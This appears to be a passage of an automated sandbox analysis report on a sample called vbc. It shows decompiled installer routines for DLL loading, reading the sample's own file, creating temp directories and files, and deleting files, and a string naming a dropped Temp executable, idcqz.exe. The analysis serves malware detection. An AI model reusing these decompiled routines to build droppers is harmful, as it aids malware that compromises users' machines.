          • Associated: 00000004.00000002.984636669.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
          • Associated: 00000004.00000002.984640728.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
          • Associated: 00000004.00000002.984645184.000000000040C000.00000004.00000001.01000000.00000004.sdmpDownload File
          • Associated: 00000004.00000002.984839010.000000000077C000.00000004.00000001.01000000.00000004.sdmpDownload File
          • Associated: 00000004.00000002.984846067.0000000000782000.00000004.00000001.01000000.00000004.sdmpDownload File
          • Associated: 00000004.00000002.984851092.0000000000786000.00000004.00000001.01000000.00000004.sdmpDownload File
          • Associated: 00000004.00000002.984855453.0000000000788000.00000004.00000001.01000000.00000004.sdmpDownload File
          • Associated: 00000004.00000002.984866339.00000000007A6000.00000004.00000001.01000000.00000004.sdmpDownload File
          • Associated: 00000004.00000002.984871682.00000000007B5000.00000004.00000001.01000000.00000004.sdmpDownload File
          • Associated: 00000004.00000002.984876092.00000000007B9000.00000002.00000001.01000000.00000004.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_4_2_400000_vbc.jbxd
          Similarity
          • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
          • String ID: C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\idcqz.exe C:\Users\user\AppData\Local\Temp\dknqrab
          • API String ID: 1941528284-1084134097
          • Opcode ID: c88ed36c007d22437061545d9d5dec38a2b75a4754de15431c99bf9f19713014
          • Instruction ID: c895feda3e823d9c0bc0fb7144dfd3dc41df657037fc16576ccee127d24ab7e8
          • Opcode Fuzzy Hash: c88ed36c007d22437061545d9d5dec38a2b75a4754de15431c99bf9f19713014
          • Instruction Fuzzy Hash: CB41D571800108BACF11BBB5DD85DAE7679EF45328F20463FF422B11E1DB3D89619A2E
          Uniqueness

          Uniqueness Score: -1.00%

          Control-flow Graph

          • Executed
          • Not Executed
          control_flow_graph 521 4069cb-4069eb GetSystemDirectoryW 522 4069ed 521->522 523 4069ef-4069f1 521->523 522->523 524 406a02-406a04 523->524 525 4069f3-4069fc 523->525 527 406a05-406a38 wsprintfW LoadLibraryExW 524->527 525->524 526 4069fe-406a00 525->526 526->527
          C-Code - Quality: 100%
          			E004069CB(intOrPtr _a4) {
          				short _v576;
          				signed int _t13;
          				struct HINSTANCE__* _t17;
          				signed int _t19;
          				void* _t24;
          
          				_t13 = GetSystemDirectoryW( &_v576, 0x104);
          				if(_t13 > 0x104) {
          					_t13 = 0;
          				}
          				if(_t13 == 0 ||  *((short*)(_t24 + _t13 * 2 - 0x23e)) == 0x5c) {
          					_t19 = 1;
          				} else {
          					_t19 = 0;
          				}
          				wsprintfW(_t24 + _t13 * 2 - 0x23c, L"%s%S.dll", 0x40a014 + _t19 * 2, _a4);
          				_t17 = LoadLibraryExW( &_v576, 0, 8); // executed
          				return _t17;
          			}








          0x004069e2
          0x004069eb
          0x004069ed
          0x004069ed
          0x004069f1
          0x00406a04
          0x004069fe
          0x004069fe
          0x004069fe
          0x00406a1d
          0x00406a31
          0x00406a38

          APIs
          • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004069E2
          • wsprintfW.USER32 ref: 00406A1D
          • LoadLibraryExW.KERNELBASE(?,00000000,00000008), ref: 00406A31
          Strings
          Memory Dump Source
          • Source File: 00000004.00000002.984631376.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000004.00000002.984628051.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
          • Associated: 00000004.00000002.984636669.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
          • Associated: 00000004.00000002.984640728.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
          • Associated: 00000004.00000002.984645184.000000000040C000.00000004.00000001.01000000.00000004.sdmpDownload File
          • Associated: 00000004.00000002.984839010.000000000077C000.00000004.00000001.01000000.00000004.sdmpDownload File
          • Associated: 00000004.00000002.984846067.0000000000782000.00000004.00000001.01000000.00000004.sdmpDownload File
          • Associated: 00000004.00000002.984851092.0000000000786000.00000004.00000001.01000000.00000004.sdmpDownload File
          • Associated: 00000004.00000002.984855453.0000000000788000.00000004.00000001.01000000.00000004.sdmpDownload File
          • Associated: 00000004.00000002.984866339.00000000007A6000.00000004.00000001.01000000.00000004.sdmpDownload File
          • Associated: 00000004.00000002.984871682.00000000007B5000.00000004.00000001.01000000.00000004.sdmpDownload File
          • Associated: 00000004.00000002.984876092.00000000007B9000.00000002.00000001.01000000.00000004.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_4_2_400000_vbc.jbxd
          Similarity
          • API ID: DirectoryLibraryLoadSystemwsprintf
          • String ID: %s%S.dll$UXTHEME$\
          • API String ID: 2200240437-1946221925
          • Opcode ID: 63130bafcb32548bd4340548baa3f8658423137b3882cd96386db367ad08b740
          • Instruction ID: edb644a17e19fa0d5d66c6da3b257654e99a3b388903ea93700411201bdfbebd
          • Opcode Fuzzy Hash: 63130bafcb32548bd4340548baa3f8658423137b3882cd96386db367ad08b740
          • Instruction Fuzzy Hash: 37F0F671600219A7DB14BB64DD0EF9B376CAB00304F11447AA646F10D0FB7CDB68CB98
          Uniqueness

          Uniqueness Score: -1.00%

          Control-flow Graph

          • Executed
          • Not Executed
          control_flow_graph 528 40347f-4034a7 GetTickCount 529 4035d7-4035df call 40302e 528->529 530 4034ad-4034d8 call 4035fe SetFilePointer 528->530 535 4035e1-4035e5 529->535 536 4034dd-4034ef 530->536 537 4034f1 536->537 538 4034f3-403501 call 4035e8 536->538 537->538 541 403507-403513 538->541 542 4035c9-4035cc 538->542 543 403519-40351f 541->543 542->535 544 403521-403527 543->544 545 40354a-403566 call 406b96 543->545 544->545 546 403529-403549 call 40302e 544->546 551 4035d2 545->551 552 403568-403570 545->552 546->545 553 4035d4-4035d5 551->553 554 403572-40357a call 406210 552->554 555 403593-403599 552->555 553->535 559 40357f-403581 554->559 555->551 556 40359b-40359d 555->556 556->551 558 40359f-4035b2 556->558 558->536 560 4035b8-4035c7 SetFilePointer 558->560 561 403583-40358f 559->561 562 4035ce-4035d0 559->562 560->529 561->543 563 403591 561->563 562->553 563->558
          C-Code - Quality: 93%
          			E0040347F(intOrPtr _a4) {
          				intOrPtr _t11;
          				signed int _t12;
          				void* _t15;
          				long _t16;
          				void* _t18;
          				intOrPtr _t30;
          				intOrPtr _t33;
          				intOrPtr _t35;
          				void* _t36;
          				intOrPtr _t48;
          
          				_t33 =  *0x79f734 -  *0x40ce60 + _a4;
          				 *0x7a8aac = GetTickCount() + 0x1f4;
          				if(_t33 <= 0) {
          					L22:
          					E0040302E(1);
          					return 0;
          				}
          				E004035FE( *0x79f744);
          				SetFilePointer( *0x40a01c,  *0x40ce60, 0, 0); // executed
          				 *0x79f740 = _t33;
          				 *0x79f730 = 0;
          				while(1) {
          					_t30 = 0x4000;
          					_t11 =  *0x79f738 -  *0x79f744;
          					if(_t11 <= 0x4000) {
          						_t30 = _t11;
          					}
          					_t12 = E004035E8(0x793730, _t30);
          					if(_t12 == 0) {
          						break;
          					}
          					 *0x79f744 =  *0x79f744 + _t30;
          					 *0x40ce68 = 0x793730;
          					 *0x40ce6c = _t30;
          					L6:
          					L6:
          					if( *0x7a8ab0 != 0 &&  *0x7a8b40 == 0) {
          						 *0x79f730 =  *0x79f740 -  *0x79f734 - _a4 +  *0x40ce60;
          						E0040302E(0);
          					}
          					 *0x40ce70 = 0x78b730;
          					 *0x40ce74 = 0x8000;
          					if(E00406B96(?str?) < 0) {
          						goto L20;
          					}
          					_t35 =  *0x40ce70; // 0x78bb5b
          					_t36 = _t35 - 0x78b730;
          					if(_t36 == 0) {
          						__eflags =  *0x40ce6c; // 0x0
          						if(__eflags != 0) {
          							goto L20;
          						}
          						__eflags = _t30;
          						if(_t30 == 0) {
          							goto L20;
          						}
          						L16:
          						_t16 =  *0x79f734;
          						if(_t16 -  *0x40ce60 + _a4 > 0) {
          							continue;
          						}
          						SetFilePointer( *0x40a01c, _t16, 0, 0);
          						goto L22;
          					}
          					_t18 = E00406210( *0x40a01c, 0x78b730, _t36); // executed
          					if(_t18 == 0) {
          						_push(0xfffffffe);
          						L21:
          						_pop(_t15);
          						return _t15;
          					}
          					 *0x40ce60 =  *0x40ce60 + _t36;
          					_t48 =  *0x40ce6c; // 0x0
          					if(_t48 != 0) {
          						goto L6;
          					}
          					goto L16;
          					L20:
          					_push(0xfffffffd);
          					goto L21;
          				}
          				return _t12 | 0xffffffff;
          			}













          0x0040348f
          0x004034a2
          0x004034a7
          0x004035d7
          0x004035d9
          0x00000000
          0x004035df
          0x004034b3
          0x004034c6
          0x004034cc
          0x004034d2
          0x004034dd
          0x004034e2
          0x004034e7
          0x004034ef
          0x004034f1
          0x004034f1
          0x004034fa
          0x00403501
          0x00000000
          0x00000000
          0x00403507
          0x0040350d
          0x00403513
          0x00000000
          0x00403519
          0x0040351f
          0x0040353f
          0x00403544
          0x00403549
          0x0040354f
          0x00403555
          0x00403566
          0x00000000
          0x00000000
          0x00403568
          0x0040356e
          0x00403570
          0x00403593
          0x00403599
          0x00000000
          0x00000000
          0x0040359b
          0x0040359d
          0x00000000
          0x00000000
          0x0040359f
          0x0040359f
          0x004035b2
          0x00000000
          0x00000000
          0x004035c1
          0x00000000
          0x004035c1
          0x0040357a
          0x00403581
          0x004035ce
          0x004035d4
          0x004035d4
          0x00000000
          0x004035d4
          0x00403583
          0x00403589
          0x0040358f
          0x00000000
          0x00000000
          0x00000000
          0x004035d2
          0x004035d2
          0x00000000
          0x004035d2
          0x00000000

          APIs
          • GetTickCount.KERNEL32(00000000,00000000,?,00000000,004033A9,00000004,00000000,00000000,?,?,00403323,000000FF,00000000,00000000,?,?), ref: 00403493
            • Part of subcall function 004035FE: SetFilePointer.KERNELBASE(00000000,00000000,00000000,004032FC,?), ref: 0040360C
          • SetFilePointer.KERNELBASE(00000000,00000000,?,00000000,004033A9,00000004,00000000,00000000,?,?,00403323,000000FF,00000000,00000000,?,?), ref: 004034C6
          • SetFilePointer.KERNEL32(?,00000000,00000000,-Ly,00793730,00004000,?,00000000,004033A9,00000004,00000000,00000000,?,?,00403323,000000FF), ref: 004035C1
          Strings
          Memory Dump Source
          • Source File: 00000004.00000002.984631376.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000004.00000002.984628051.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
          • Associated: 00000004.00000002.984636669.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
          • Associated: 00000004.00000002.984640728.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
          • Associated: 00000004.00000002.984645184.000000000040C000.00000004.00000001.01000000.00000004.sdmpDownload File
          • Associated: 00000004.00000002.984839010.000000000077C000.00000004.00000001.01000000.00000004.sdmpDownload File
          • Associated: 00000004.00000002.984846067.0000000000782000.00000004.00000001.01000000.00000004.sdmpDownload File
          • Associated: 00000004.00000002.984851092.0000000000786000.00000004.00000001.01000000.00000004.sdmpDownload File
          • Associated: 00000004.00000002.984855453.0000000000788000.00000004.00000001.01000000.00000004.sdmpDownload File
          • Associated: 00000004.00000002.984866339.00000000007A6000.00000004.00000001.01000000.00000004.sdmpDownload File
          • Associated: 00000004.00000002.984871682.00000000007B5000.00000004.00000001.01000000.00000004.sdmpDownload File
          • Associated: 00000004.00000002.984876092.00000000007B9000.00000002.00000001.01000000.00000004.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_4_2_400000_vbc.jbxd
          Similarity
          • API ID: FilePointer$CountTick
          • String ID: -Ly$07y
          • API String ID: 1092082344-230390750
          • Opcode ID: 5ef9f3cf75525ab0b28f5e9a18968e2fb4815e048a68f3a4626f05087b93d5e0
          • Instruction ID: fa4fce997e9b0d1f670701ff0d5ea0446f36afc43afd7a1273bf0b0fb6409833
          • Opcode Fuzzy Hash: 5ef9f3cf75525ab0b28f5e9a18968e2fb4815e048a68f3a4626f05087b93d5e0
          • Instruction Fuzzy Hash: 6E31AEB2510215EFCB209F69FE8492A3BADF74475A714423BE401B22F0DB795D02CB9D
          Uniqueness

          Uniqueness Score: -1.00%

          Control-flow Graph

          • Executed
          • Not Executed
          control_flow_graph 564 405b9f-405bea CreateDirectoryW 565 405bf0-405bfd GetLastError 564->565 566 405bec-405bee 564->566 567 405c17-405c19 565->567 568 405bff-405c13 SetFileSecurityW 565->568 566->567 568->566 569 405c15 GetLastError 568->569 569->567
          C-Code - Quality: 100%
          			E00405B9F(WCHAR* _a4) {
          				struct _SECURITY_ATTRIBUTES _v16;
          				struct _SECURITY_DESCRIPTOR _v36;
          				int _t22;
          				long _t23;
          
          				_v36.Sbz1 = _v36.Sbz1 & 0x00000000;
          				_v36.Owner = 0x4083f8;
          				_v36.Group = 0x4083f8;
          				_v36.Sacl = _v36.Sacl & 0x00000000;
          				_v16.bInheritHandle = _v16.bInheritHandle & 0x00000000;
          				_v16.lpSecurityDescriptor =  &_v36;
          				_v36.Revision = 1;
          				_v36.Control = 4;
          				_v36.Dacl = 0x4083e8;
          				_v16.nLength = 0xc;
          				_t22 = CreateDirectoryW(_a4,  &_v16); // executed
          				if(_t22 != 0) {
          					L1:
          					return 0;
          				}
          				_t23 = GetLastError();
          				if(_t23 == 0xb7) {
          					if(SetFileSecurityW(_a4, 0x80000007,  &_v36) != 0) {
          						goto L1;
          					}
          					return GetLastError();
          				}
          				return _t23;
          			}







          0x00405baa
          0x00405bae
          0x00405bb1
          0x00405bb7
          0x00405bbb
          0x00405bbf
          0x00405bc7
          0x00405bce
          0x00405bd4
          0x00405bdb
          0x00405be2
          0x00405bea
          0x00405bec
          0x00000000
          0x00405bec
          0x00405bf6
          0x00405bfd
          0x00405c13
          0x00000000
          0x00000000
          0x00000000
          0x00405c15
          0x00405c19

          APIs
          • CreateDirectoryW.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\), ref: 00405BE2
          • GetLastError.KERNEL32 ref: 00405BF6
          • SetFileSecurityW.ADVAPI32(?,80000007,00000001), ref: 00405C0B
          • GetLastError.KERNEL32 ref: 00405C15
          Strings
          • C:\Users\user\AppData\Local\Temp\, xrefs: 00405BC5
          Memory Dump Source
          • Source File: 00000004.00000002.984631376.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000004.00000002.984628051.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
          • Associated: 00000004.00000002.984636669.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
          • Associated: 00000004.00000002.984640728.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
          • Associated: 00000004.00000002.984645184.000000000040C000.00000004.00000001.01000000.00000004.sdmpDownload File
          • Associated: 00000004.00000002.984839010.000000000077C000.00000004.00000001.01000000.00000004.sdmpDownload File
          • Associated: 00000004.00000002.984846067.0000000000782000.00000004.00000001.01000000.00000004.sdmpDownload File
          • Associated: 00000004.00000002.984851092.0000000000786000.00000004.00000001.01000000.00000004.sdmpDownload File
          • Associated: 00000004.00000002.984855453.0000000000788000.00000004.00000001.01000000.00000004.sdmpDownload File
          • Associated: 00000004.00000002.984866339.00000000007A6000.00000004.00000001.01000000.00000004.sdmpDownload File
          • Associated: 00000004.00000002.984871682.00000000007B5000.00000004.00000001.01000000.00000004.sdmpDownload File
          • Associated: 00000004.00000002.984876092.00000000007B9000.00000002.00000001.01000000.00000004.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_4_2_400000_vbc.jbxd
          Similarity
          • API ID: ErrorLast$CreateDirectoryFileSecurity
          • String ID: C:\Users\user\AppData\Local\Temp\
          • API String ID: 3449924974-4017390910
          • Opcode ID: 4d8c721838b8a92ea27708fe49d100345a2f80ebd1be40878b53e15a1b169c58
          • Instruction ID: a4b5b825bdd4266eac6b0ee8a32438dce20ed58698919e53373cd8165130f89a
          • Opcode Fuzzy Hash: 4d8c721838b8a92ea27708fe49d100345a2f80ebd1be40878b53e15a1b169c58
          • Instruction Fuzzy Hash: 31010871D04219EAEF009BA0C944BEFBFB8EF04314F00403AD545B6191E7799A48CF99
          Uniqueness

          Uniqueness Score: -1.00%

          Control-flow Graph

          • Executed
          • Not Executed
          control_flow_graph 570 40618d-406199 571 40619a-4061ce GetTickCount GetTempFileNameW 570->571 572 4061d0-4061d2 571->572 573 4061dd-4061df 571->573 572->571 574 4061d4 572->574 575 4061d7-4061da 573->575 574->575
          C-Code - Quality: 100%
          			E0040618D(void* __ecx, WCHAR* _a4, WCHAR* _a8) {
          				intOrPtr _v8;
          				short _v12;
          				short _t12;
          				intOrPtr _t13;
          				signed int _t14;
          				WCHAR* _t17;
          				signed int _t19;
          				signed short _t23;
          				WCHAR* _t26;
          
          				_t26 = _a4;
          				_t23 = 0x64;
          				while(1) {
          					_t12 =  *L"nsa"; // 0x73006e
          					_t23 = _t23 - 1;
          					_v12 = _t12;
          					_t13 =  *0x40a5ac; // 0x61
          					_v8 = _t13;
          					_t14 = GetTickCount();
          					_t19 = 0x1a;
          					_v8 = _v8 + _t14 % _t19;
          					_t17 = GetTempFileNameW(_a8,  &_v12, 0, _t26); // executed
          					if(_t17 != 0) {
          						break;
          					}
          					if(_t23 != 0) {
          						continue;
          					} else {
          						 *_t26 =  *_t26 & _t23;
          					}
          					L4:
          					return _t17;
          				}
          				_t17 = _t26;
          				goto L4;
          			}












          0x00406193
          0x00406199
          0x0040619a
          0x0040619a
          0x0040619f
          0x004061a0
          0x004061a3
          0x004061a8
          0x004061ab
          0x004061b5
          0x004061c2
          0x004061c6
          0x004061ce
          0x00000000
          0x00000000
          0x004061d2
          0x00000000
          0x004061d4
          0x004061d4
          0x004061d4
          0x004061d7
          0x004061da
          0x004061da
          0x004061dd
          0x00000000

          APIs
          • GetTickCount.KERNEL32(7556D4C4,C:\Users\user\AppData\Local\Temp\,?,?,?,00403644,1033,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403929), ref: 004061AB
          • GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,?,00403644,1033,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403929), ref: 004061C6
          Strings
          Memory Dump Source
          • Source File: 00000004.00000002.984631376.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000004.00000002.984628051.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
          • Associated: 00000004.00000002.984636669.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
          • Associated: 00000004.00000002.984640728.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
          • Associated: 00000004.00000002.984645184.000000000040C000.00000004.00000001.01000000.00000004.sdmpDownload File
          • Associated: 00000004.00000002.984839010.000000000077C000.00000004.00000001.01000000.00000004.sdmpDownload File
          • Associated: 00000004.00000002.984846067.0000000000782000.00000004.00000001.01000000.00000004.sdmpDownload File
          • Associated: 00000004.00000002.984851092.0000000000786000.00000004.00000001.01000000.00000004.sdmpDownload File
          • Associated: 00000004.00000002.984855453.0000000000788000.00000004.00000001.01000000.00000004.sdmpDownload File
          • Associated: 00000004.00000002.984866339.00000000007A6000.00000004.00000001.01000000.00000004.sdmpDownload File
          • Associated: 00000004.00000002.984871682.00000000007B5000.00000004.00000001.01000000.00000004.sdmpDownload File
          • Associated: 00000004.00000002.984876092.00000000007B9000.00000002.00000001.01000000.00000004.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_4_2_400000_vbc.jbxd
          Similarity
          • API ID: CountFileNameTempTick
          • String ID: C:\Users\user\AppData\Local\Temp\$nsa
          • API String ID: 1716503409-4262883142
          • Opcode ID: 6315ab6e6f8253ba2c88c9b6803a176270f8621abb800126aa0f3c3b7b9ef66c
          • Instruction ID: 4618a7cd5e379287717806b061479f75a97df545f28ae60e57938b9bb9b89627
          • Opcode Fuzzy Hash: 6315ab6e6f8253ba2c88c9b6803a176270f8621abb800126aa0f3c3b7b9ef66c
          • Instruction Fuzzy Hash: 4CF09676700214BFDB008F55ED05E9AB7BCEF91710F11803AEE05E7150E6B099548764
          Uniqueness

          Uniqueness Score: -1.00%

          Control-flow Graph

          • Executed
          • Not Executed
          control_flow_graph 576 403377-403384 577 4033a2-4033ab call 40347f 576->577 578 403386-40339c SetFilePointer 576->578 581 4033b1-4033c4 call 4061e1 577->581 582 403479-40347c 577->582 578->577 585 403469 581->585 586 4033ca-4033dd call 40347f 581->586 588 40346b-40346c 585->588 590 4033e3-4033e6 586->590 591 403477 586->591 588->582 592 403445-40344b 590->592 593 4033e8-4033eb 590->593 591->582 594 403450-403467 ReadFile 592->594 595 40344d 592->595 593->591 596 4033f1 593->596 594->585 597 40346e-403471 594->597 595->594 598 4033f6-403400 596->598 597->591 599 403402 598->599 600 403407-403419 call 4061e1 598->600 599->600 600->585 603 40341b-403422 call 406210 600->603 605 403427-403429 603->605 606 403441-403443 605->606 607 40342b-40343d 605->607 606->588 607->598 608 40343f 607->608 608->591
          C-Code - Quality: 92%
          			E00403377(void* __ecx, long _a4, intOrPtr _a8, void* _a12, long _a16) {
          				long _v8;
          				long _t21;
          				long _t22;
          				void* _t24;
          				long _t26;
          				int _t27;
          				long _t28;
          				void* _t30;
          				long _t31;
          				long _t32;
          				long _t36;
          
          				_t21 = _a4;
          				if(_t21 >= 0) {
          					_t32 = _t21 +  *0x7a8af8;
          					 *0x79f734 = _t32;
          					SetFilePointer( *0x40a01c, _t32, 0, 0); // executed
          				}
          				_t22 = E0040347F(4);
          				if(_t22 >= 0) {
          					_t24 = E004061E1( *0x40a01c,  &_a4, 4); // executed
          					if(_t24 == 0) {
          						L18:
          						_push(0xfffffffd);
          						goto L19;
          					} else {
          						 *0x79f734 =  *0x79f734 + 4;
          						_t36 = E0040347F(_a4);
          						if(_t36 < 0) {
          							L21:
          							_t22 = _t36;
          						} else {
          							if(_a12 != 0) {
          								_t26 = _a4;
          								if(_t26 >= _a16) {
          									_t26 = _a16;
          								}
          								_t27 = ReadFile( *0x40a01c, _a12, _t26,  &_v8, 0); // executed
          								if(_t27 != 0) {
          									_t36 = _v8;
          									 *0x79f734 =  *0x79f734 + _t36;
          									goto L21;
          								} else {
          									goto L18;
          								}
          							} else {
          								if(_a4 <= 0) {
          									goto L21;
          								} else {
          									while(1) {
          										_t28 = _a4;
          										if(_a4 >= 0x4000) {
          											_t28 = 0x4000;
          										}
          										_v8 = _t28;
          										if(E004061E1( *0x40a01c, 0x793730, _t28) == 0) {
          											goto L18;
          										}
          										_t30 = E00406210(_a8, 0x793730, _v8); // executed
          										if(_t30 == 0) {
          											_push(0xfffffffe);
          											L19:
          											_pop(_t22);
          										} else {
          											_t31 = _v8;
          											_a4 = _a4 - _t31;
          											 *0x79f734 =  *0x79f734 + _t31;
          											_t36 = _t36 + _t31;
          											if(_a4 > 0) {
          												continue;
          											} else {
          												goto L21;
          											}
          										}
          										goto L22;
          									}
          									goto L18;
          								}
          							}
          						}
          					}
          				}
          				L22:
          				return _t22;
          			}














          0x0040337b
          0x00403384
          0x0040338d
          0x00403391
          0x0040339c
          0x0040339c
          0x004033a4
          0x004033ab
          0x004033bd
          0x004033c4
          0x00403469
          0x00403469
          0x00000000
          0x004033ca
          0x004033cd
          0x004033d9
          0x004033dd
          0x00403477
          0x00403477
          0x004033e3
          0x004033e6
          0x00403445
          0x0040344b
          0x0040344d
          0x0040344d
          0x0040345f
          0x00403467
          0x0040346e
          0x00403471
          0x00000000
          0x00000000
          0x00000000
          0x00000000
          0x004033e8
          0x004033eb
          0x00000000
          0x004033f1
          0x004033f6
          0x004033fd
          0x00403400
          0x00403402
          0x00403402
          0x0040340f
          0x00403419
          0x00000000
          0x00000000
          0x00403422
          0x00403429
          0x00403441
          0x0040346b
          0x0040346b
          0x0040342b
          0x0040342b
          0x0040342e
          0x00403431
          0x00403437
          0x0040343d
          0x00000000
          0x0040343f
          0x00000000
          0x0040343f
          0x0040343d
          0x00000000
          0x00403429
          0x00000000
          0x004033f6
          0x004033eb
          0x004033e6
          0x004033dd
          0x004033c4
          0x00403479
          0x0040347c

          APIs
          • SetFilePointer.KERNELBASE(?,00000000,00000000,00000000,00000000,?,?,00403323,000000FF,00000000,00000000,?,?), ref: 0040339C
          Strings
          Memory Dump Source
          • Source File: 00000004.00000002.984631376.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000004.00000002.984628051.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
          • Associated: 00000004.00000002.984636669.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
          • Associated: 00000004.00000002.984640728.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
          • Associated: 00000004.00000002.984645184.000000000040C000.00000004.00000001.01000000.00000004.sdmpDownload File
          • Associated: 00000004.00000002.984839010.000000000077C000.00000004.00000001.01000000.00000004.sdmpDownload File
          • Associated: 00000004.00000002.984846067.0000000000782000.00000004.00000001.01000000.00000004.sdmpDownload File
          • Associated: 00000004.00000002.984851092.0000000000786000.00000004.00000001.01000000.00000004.sdmpDownload File
          • Associated: 00000004.00000002.984855453.0000000000788000.00000004.00000001.01000000.00000004.sdmpDownload File
          • Associated: 00000004.00000002.984866339.00000000007A6000.00000004.00000001.01000000.00000004.sdmpDownload File
          • Associated: 00000004.00000002.984871682.00000000007B5000.00000004.00000001.01000000.00000004.sdmpDownload File
          • Associated: 00000004.00000002.984876092.00000000007B9000.00000002.00000001.01000000.00000004.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_4_2_400000_vbc.jbxd
          Similarity
          • API ID: FilePointer
          • String ID: 07y
          • API String ID: 973152223-1660179758
          • Opcode ID: 6b22196eac9600fa0887d596689305aa324d5ca70b4b9ec5c244ac4710233144
          • Instruction ID: 558639dd8831905cecc0235a21772d735375f1fafe9af626847c4dd8eee9aa20
          • Opcode Fuzzy Hash: 6b22196eac9600fa0887d596689305aa324d5ca70b4b9ec5c244ac4710233144
          • Instruction Fuzzy Hash: 73319330201218FFDF129FA5ED85D9E3F68EB00359F10803AF905E9190D778DA51DBA9
          Uniqueness

          Uniqueness Score: -1.00%

          Control-flow Graph

          • Executed
          • Not Executed
          control_flow_graph 609 405d32-405d43 call 406139 612 405d73 609->612 613 405d45-405d4b 609->613 614 405d75-405d77 612->614 615 405d55 DeleteFileW 613->615 616 405d4d-405d53 RemoveDirectoryW 613->616 617 405d5b-405d5d 615->617 616->617 618 405d64-405d69 617->618 619 405d5f-405d62 617->619 618->612 620 405d6b-405d6d SetFileAttributesW 618->620 619->614 620->612
          C-Code - Quality: 41%
          			E00405D32(void* __eflags, WCHAR* _a4, signed int _a8) {
          				int _t9;
          				long _t13;
          				WCHAR* _t14;
          
          				_t14 = _a4;
          				_t13 = E00406139(_t14);
          				if(_t13 == 0xffffffff) {
          					L8:
          					return 0;
          				}
          				_push(_t14);
          				if((_a8 & 0x00000001) == 0) {
          					_t9 = DeleteFileW();
          				} else {
          					_t9 = RemoveDirectoryW(); // executed
          				}
          				if(_t9 == 0) {
          					if((_a8 & 0x00000004) == 0) {
          						SetFileAttributesW(_t14, _t13);
          					}
          					goto L8;
          				} else {
          					return 1;
          				}
          			}






          0x00405d33
          0x00405d3e
          0x00405d43
          0x00405d73
          0x00000000
          0x00405d73
          0x00405d4a
          0x00405d4b
          0x00405d55
          0x00405d4d
          0x00405d4d
          0x00405d4d
          0x00405d5d
          0x00405d69
          0x00405d6d
          0x00405d6d
          0x00000000
          0x00405d5f
          0x00000000
          0x00405d61

          APIs
            • Part of subcall function 00406139: GetFileAttributesW.KERNELBASE(?,?,00405D3E,?,?,00000000,00405F14,?,?,?,?), ref: 0040613E
            • Part of subcall function 00406139: SetFileAttributesW.KERNELBASE(?,00000000), ref: 00406152
          • RemoveDirectoryW.KERNELBASE(?,?,?,00000000,00405F14), ref: 00405D4D
          • DeleteFileW.KERNEL32(?,?,?,00000000,00405F14), ref: 00405D55
          • SetFileAttributesW.KERNEL32(?,00000000), ref: 00405D6D
          Memory Dump Source
          • Source File: 00000004.00000002.984631376.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000004.00000002.984628051.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
          • Associated: 00000004.00000002.984636669.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
          • Associated: 00000004.00000002.984640728.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
          • Associated: 00000004.00000002.984645184.000000000040C000.00000004.00000001.01000000.00000004.sdmpDownload File
          • Associated: 00000004.00000002.984839010.000000000077C000.00000004.00000001.01000000.00000004.sdmpDownload File
          • Associated: 00000004.00000002.984846067.0000000000782000.00000004.00000001.01000000.00000004.sdmpDownload File
          • Associated: 00000004.00000002.984851092.0000000000786000.00000004.00000001.01000000.00000004.sdmpDownload File
          • Associated: 00000004.00000002.984855453.0000000000788000.00000004.00000001.01000000.00000004.sdmpDownload File
          • Associated: 00000004.00000002.984866339.00000000007A6000.00000004.00000001.01000000.00000004.sdmpDownload File
          • Associated: 00000004.00000002.984871682.00000000007B5000.00000004.00000001.01000000.00000004.sdmpDownload File
